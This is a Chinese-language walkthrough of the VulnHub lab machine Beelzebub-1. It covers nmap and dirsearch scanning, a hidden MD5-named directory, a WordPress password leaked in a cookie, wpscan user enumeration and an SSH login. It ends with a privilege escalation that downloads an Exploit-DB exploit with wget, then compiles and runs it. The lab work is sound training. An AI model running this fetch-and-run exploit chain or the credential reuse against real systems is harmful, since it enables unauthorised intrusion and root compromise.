『vulnhub系列』BEELZEBUB- 1

『vulnhub系列』BEELZEBUB- 1

下载地址：

https://www.vulnhub.com/entry/beelzebub-1,742/

信息搜集：

使用nmap扫描存活主机，发现主机开启了22和80端口

nmap 192.168.0.*

访问80端口的web服务，发现是apache的默认页面

使用dirsearch扫描目录

dirsearch -u "http://192.168.0.140/"

发现存在phpmyadmin等页面，访问index.php页面，发现是404 /login也是一样

感觉有猫腻，查看一下源代码，果然发现一行提示

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了，"beelzebub"不知如何被入侵了，并且被解密了 md5

大概的意思是本来是被加密的，后来被用md5解密了，现在我们使用md5加密一下

d18e1e22becbd915b45e0e655429d487

然后当作目录扫描一下

dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"

然后我们发现是个Wordpress 网站，里面有登录页面（这里靶机换了ip变为192.168.0.128）

还有一个文件上传的目录页面

点开Talk To VALAK 发现是个带有输入框的页面

随便输入一个数据，查看cookie 多出来一个Password 值为M4k3Ad3a1

因为是Wordpress页面，因此可以使用工具wpscan

使用命令：

wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive

• --ignore-main-redirect 忽略重定向扫描目标
• --force 不检查是否运行wordpress
• -e --enumerate 枚举，默认枚举所有插件，备份
• --plugins-detection aggressive 使用提供的模式枚举插件 默认被动（passvie）可选：混合（mix）被动（passvie）主动（aggressive）

扫描到用户valak 和krampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录

因为wordpress页面跳转有些问题，我们使用ssh登录，使用krampus登录成功

权限提升：

进入系统后，使用命令ls -la 发现有两个文件很可疑

但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到命令历史

然后我们发现有一个wget和gcc编译命令，我们照着运行

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o 1

./1

成果：